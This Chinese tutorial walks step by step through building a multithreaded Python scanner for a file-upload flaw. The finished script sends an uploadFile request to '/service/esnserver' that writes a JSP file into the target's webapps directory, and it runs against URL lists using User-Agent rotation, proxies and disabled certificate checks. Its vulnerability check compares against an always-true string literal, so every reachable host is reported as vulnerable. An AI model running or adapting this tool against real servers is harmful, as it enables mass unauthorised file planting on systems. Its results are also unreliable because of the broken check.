文件上传漏洞检测脚本编写

一、前言

  • 首先,既然是要针对于文件上传写批量检测脚本,那么就得提前考虑这么几个可能存在的信息,正片文章均基于以下内容进行编写:
    1. 爬虫使用:为了方便的验证poc,常使用爬虫来进行自动化测试
    2. 传参方式:post型还是get型
    3. 数据传递:是get型的拼接在url后,还是以post正文的形式存在
    4. 传参路径:通过什么接口进行上传操作的
    5. 漏洞验证逻辑:针对该次漏洞验证,写出尽量准确的匹配规则
    6. 爬虫优化:针对于该次漏洞验证,爬虫的优化策略
    7. 效率提升:是否使用多线程,文件是否实时写入,以降低内存负荷

二、脚本前期准备

  • 一般来说,因为文件上传的内容通常较大,因此都是存在于正文中的,故本文章以post传参的形式来讲解。

1. 决定爬虫框架

  • 以下内容都基于提前引入python的requests

既然通过post进行传参,那么就一定涉及到request的post方法的相关使用,基本格式如下

response = requests.post(url, headers="相关header头", data="格式")

因此,就要提前定义好该次漏洞检测的header头内容以及数据传递格式,关于数据传递格式,下面会进行详解,这里暂时只需要关注header头内容。

  • 可能会存在但不限于以下内容的检测,可以使用相应的内容来自动化:
  1. 是否对特定的UA头进行了检测?

    • 使用UA头池,从多个UA头中随机选择一个使用
    headers_list = [
            {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
            {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'},
            {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
            {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
            {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
        ]
    
    #使用方法(需引入random库以支持该方式):
    headers = random.choice(headers_list)
    
  2. 是否会检测Cookie值?

    • 如果Cookie是固定的,则可以写死在代码中:
    session = requests.Session()
    response = session.post(url, data="数据格式")
    
    • 如果Cookie是变化的,则可以根据相关的api接口来获取,例如此处的通过用户登录接口来获取,获取成功之后即可正常使用。
    login_url = 'https://example.com/login'
    login_data = {
        'username': 'your_username',
        'password': 'your_password'
    }
    response = session.post(login_url, data=login_data)
    
  3. 是否指定了Content-Type的值?

    • 首先Content-Type字段有3个数据类型,下面一一列出

    1. JSON 数据请求(如 API 接口传 JSON 数据使用application/json):
    headers = {
        'Content-Type': 'application/json'
    }
    data = "数据内容"
    response = requests.post(url, data=data, headers=headers)
    
    1. 表单数据请求(如上传文件使用 multipart/form-data):
    headers = {
        'Content-Type': 'multipart/form-data'
    }
    data = "数据内容"
    response = requests.post(url, data=data, headers=headers)
    
    1. URL 编码的表单数据(如常见的表单提交,使用 application/x-www-form-urlencoded):
    url = 'https://example.com/submit'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    data = "数据内容"
    response = requests.post(url, data=data, headers=headers)
    

2. 数据传递方式

  • 首先,既然是通过post传递数据,那么我们肯定得先考虑是使用什么格式进行数据传递的,常见的数据格式有3种,分别是json形式、data形式、xml形式

(1). json格式

  • 可以通过request.post的相关参数直接指定

    data = {
    	"username":"admin"
    	"password":"admin"
    }
    response = requests.post(url, json=data, headers=headers)
    

(2). data形式

  • 可以通过request.post的相关参数直接指定

    data = "数据内容"
    response = requests.post(url, data=data, headers=headers)
    

(3). xml形式

  • 需要结合Content-Type来指定

    xml_data = '''<?xml version="1.0" encoding="UTF-8"?>
    <request>
        <field1>value1</field1>
        <field2>value2</field2>
    </request>'''
    
    headers = {
        'Content-Type': 'application/xml'
    }
    response = requests.post(url, data=xml_data, headers=headers)
    

3. 传参路径

  • 根据不同的文件上传漏洞,指定不同的路径,这一步很简单

    payload = "/service/esnserver"
    baseurl = "http://xxx.com"
    url = base_url + payload
    

三、脚本编写

  • 至此,最基本的文件上传漏洞脚本检测形式的前期准备已做好,可以进一步编写相关逻辑了

1. 判断url是否存活

  • 可以通过简单的返回包的状态码判断,如果为200,则判断网站能正常访问,否则网站无法访问

    initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5)
    if initial_response.status_code == 200:
    

2. 减少漏报

  • 如果只扫描一次,那么可能存在漏报情况,因此可以多次扫描,通过设置最大扫描次数并循环,以避免漏报

    max_retries = 2  #定义重试次数为2
    for attempt in range(max_retries + 1):  # 尝试次数为最大重试次数+1
        initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5)
        if initial_response.status_code == 200:
            #进入下一步,判断漏洞是否存在
            break
        else:
            print(f"{url} 无法访问")
            break  # 不符合响应状态退出循环
    

3. 判断漏洞是否存在

  • 通过该漏洞的返回关键词进行匹配。如下例,如果响应包正常返回,并且存在"data":true字符串,则认为存在该漏洞。

    if response.status_code == 200 and '"data":true':
        #进行进一步的存在漏洞url的处理,例如保存
        print(f"{url} 存在文件上传漏洞!!!!!!!!!!!")
    else:
        print(f"{url} 不存在文件上传漏洞")
    

4. 结果写入文件

  • 如果有存在该漏洞的url,则将其保存到一个列表中,后面一起写入文件

    vulnerable_urls = []
    vulnerable_urls.append(url)
    

5. 完善poc

  • 为了使程序遇到错误时不会意外终止,使用错误捕获机制进行处理
def poc(base_url):
    
    payload = "/service/esnserver"  # TODO: 修改待拼接的URL路径
    post_payload = {
        "invocationInfo": {"ucode": "123", "dataSource": "U8cloud", "lang": "en"},
        "method": "uploadFile",
        "className": "nc.itf.hr.tools.IFileTrans",
        "param": {"p1": "UEsDB...AAAAA=", "p2": "webapps/u8c_web/A7788.jsp"},
        "paramType": ["p1:[B", "p2:java.lang.String"]
    }
    
    url = base_url + payload
    
    headers_list = [
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
        {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'},
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
        {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
    ]
    
	vulnerable_urls = []

    for attempt in range(max_retries + 1):  # 尝试次数为最大重试次数+1
        try:
            headers = random.choice(headers_list)
            initial_response = requests.get(base_url, headers=headers)
            if initial_response.status_code == 200:		#检测网站是否能够正常访问
                response = requests.post(url, headers=headers, json=post_payload)
                # 检查漏洞的条件
                if response.status_code == 200 and '"data":true':
                    print(f"{url} 存在文件上传漏洞!!!!!!!!!!!")
					vulnerable_urls.append(url)
                    break  # 成功后退出重试循环
                else:
                    print(f"{url} 不存在文件上传漏洞")
                    break  # 正常响应则退出重试循环
            else:
                print(f"{url} 无法访问")
                break  # 不符合响应状态退出循环
        except:
            pass  #不处理任何的错误

四、进阶编写

1. 实时写入

  • 为了防止堆积过多的内容在内存中,导致出错时无法写入任何东西到文件中,尝试判断出存在漏洞即写入文件

    #从保存到URL列表中,修改为直接向文件写入内容
    with open(output_file, 'a') as file:
        file.write(url + '\n')
    

2. 完善错误处理

  • 为了能够更清晰的判断出错点在哪儿,可以进一步的修改错误捕获机制

    max_retries = 2  #定义重试次数为2
    for attempt in range(max_retries + 1):  # 尝试次数为最大重试次数+1
        try:
            #对漏洞进行判断并处理的逻辑
    
        except requests.Timeout:
            print(f"{url} 尝试第 {attempt + 1} 次超时")
            if attempt == max_retries:
                print(f"{url} 超过最大重试次数,跳过该URL")
        except requests.RequestException as e:
            print(f"{url} 发生异常: {e}")
            break  # 出现其他异常时退出重试循环
    

3. 爬虫优化

考虑到以下情况:

  • https协议的url可能存在证书过期的现象而导致的无法访问状态码
  • 不同网站,如果不使用代理,则无法访问
  • 重试时,爬虫可能进入无限等待的情况

可以进一步在request.post中添加参数进行完善

#添加代理
proxies = {
    "http": "http://127.0.0.1:7890",
    "https": "http://127.0.0.1:7890"
}

if initial_response.status_code == 200:
    response = requests.post(urlpath, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5)
    .........

4. 自动选择数据格式

  • 可以根据指定不同的数据格式,自动选择不同的数据请求进行执行

    request_type = "json"  # 请求类型,可选择 "json", "data", "get"
    
    headers = random.choice(headers_list)
    
    initial_response = requests.get(base_url, headers=headers, proxies=proxies, verify=False, timeout=5)
    if initial_response.status_code == 200:
        if request_type == "json":
            response = requests.post(url, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5)
        elif request_type == "data":
            response = requests.post(url, headers=headers, data=post_payload, proxies=proxies, verify=False, timeout=5)
        elif request_type == "get":
            response = requests.get(url, headers=headers, params=post_payload, proxies=proxies, verify=False, timeout=5)
            
        # 进一步地检查漏洞的条件
       .........
    

5. 采用多线程

  • 使用多线程技术,加快漏洞检测的速度,提高效率

    lock = threading.Lock()		#线程锁,避免资源冲突
    
    with lock:
        with open(output_file, 'a') as file:
            file.write(url + '\n')
    

6. 交互式操作

(1). 直接读取文件内容

def read_urls_from_file(filename):
    try:
        with open(filename, 'r') as file:
            urls = file.readlines()
            return [url.strip() for url in urls]
    except FileNotFoundError:
        print("文件未找到,请检查文件路径和名称是否正确。")
        return []

(2). 通过参数指定

  • 使用python的argparse库,指定通过cmd命令行,指定参数启动的内容
def main():
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(description="通用文件上传漏洞检测")
    parser.add_argument('-t', '--threads', type=int, default=5, help="指定线程数(默认: 5)")
    parser.add_argument('-f', '--urlfile', type=str, help="包含URL列表的文件路径")
    parser.add_argument('-o', '--output', type=str, default='result.txt', help="输出文件名称(默认: result.txt)")
    args = parser.parse_args()
    num_threads = args.threads
    output_file = args.output
    urls = read_urls_from_file(args.urlfile) if args.urlfile else []

    if urls:
        with ThreadPoolExecutor(max_workers=num_threads) as executor:
            future_to_url = {executor.submit(poc, url, output_file): url for url in urls}
            for future in as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    future.result(timeout=10)
                except TimeoutError:
                    print(f"{url} 处理超时,跳过该任务")
                except Exception as e:
                    pass
    else:
        print("没有找到有效的 URL,程序结束。")

五、最终成品

import random
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
import argparse


lock = threading.Lock()
max_retries=2       #最大超时重试次数

# 固定参数,直接在此处修改
payload = "/service/esnserver"  # TODO: 修改待拼接的URL路径
post_payload = {
    "invocationInfo": {"ucode": "123", "dataSource": "U8cloud", "lang": "en"},
    "method": "uploadFile",
    "className": "nc.itf.hr.tools.IFileTrans",
    "param": {"p1": "UEsDB...AAAAA=", "p2": "webapps/u8c_web/A7788.jsp"},
    "paramType": ["p1:[B", "p2:java.lang.String"]
}  # TODO: 修改POST请求的正文内容
request_type = "json"  # 请求类型,可选择 "json", "data", "get"

# 指定代理地址
proxies = {
    "http": "http://127.0.0.1:7890",
    "https": "http://127.0.0.1:7890"
}

def poc(url, output_file):

    urlpath = url + payload
    headers_list = [
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
        {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0 Safari/537.36'},
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
        {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"},
        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"},
    ]

    for attempt in range(max_retries + 1):  # 尝试次数为最大重试次数+1
        try:
            headers = random.choice(headers_list)
            initial_response = requests.get(url, headers=headers, proxies=proxies, verify=False, timeout=5)
            if initial_response.status_code == 200:
                if request_type == "json":
                    response = requests.post(urlpath, headers=headers, json=post_payload, proxies=proxies, verify=False, timeout=5)
                elif request_type == "data":
                    response = requests.post(urlpath, headers=headers, data=post_payload, proxies=proxies, verify=False, timeout=5)
                elif request_type == "get":
                    response = requests.get(urlpath, headers=headers, params=post_payload, proxies=proxies, verify=False, timeout=5)

                # 检查漏洞的条件
                if response.status_code == 200 and '"data":true':
                    print(f"{url} 存在文件上传漏洞!!!!!!!!!!!")
                    with lock:
                        with open(output_file, 'a') as file:
                            file.write(url + '\n')
                    break  # 成功后退出重试循环
                else:
                    print(f"{url} 不存在文件上传漏洞")
                    break  # 正常响应则退出重试循环
            else:
                print(f"{url} 无法访问")
                break  # 不符合响应状态退出循环
        except requests.Timeout:
            print(f"{url} 尝试第 {attempt + 1} 次超时")
            if attempt == max_retries:
                print(f"{url} 超过最大重试次数,跳过该URL")
        except requests.RequestException as e:
            print(f"{url} 发生异常: {e}")
            break  # 出现其他异常时退出重试循环


def read_urls_from_file(filename):
    try:
        with open(filename, 'r') as file:
            urls = file.readlines()
            return [url.strip() for url in urls]
    except FileNotFoundError:
        print("文件未找到,请检查文件路径和名称是否正确。")
        return []

def main():
    urllib3.disable_warnings()
    parser = argparse.ArgumentParser(description="通用文件上传漏洞检测")
    parser.add_argument('-t', '--threads', type=int, default=5, help="指定线程数(默认: 5)")
    parser.add_argument('-f', '--urlfile', type=str, help="包含URL列表的文件路径")
    parser.add_argument('-o', '--output', type=str, default='result.txt', help="输出文件名称(默认: result.txt)")
    args = parser.parse_args()
    num_threads = args.threads
    output_file = args.output
    urls = read_urls_from_file(args.urlfile) if args.urlfile else []

    if urls:
        with ThreadPoolExecutor(max_workers=num_threads) as executor:
            future_to_url = {executor.submit(poc, url, output_file): url for url in urls}
            for future in as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    future.result(timeout=10)
                except TimeoutError:
                    print(f"{url} 处理超时,跳过该任务")
                except Exception as e:
                    pass
    else:
        print("没有找到有效的 URL,程序结束。")

if __name__ == '__main__':
    main()

六、使用方法

#通过命令行启动该脚本
python file_upload.py -f urls.txt -t 200

使用案例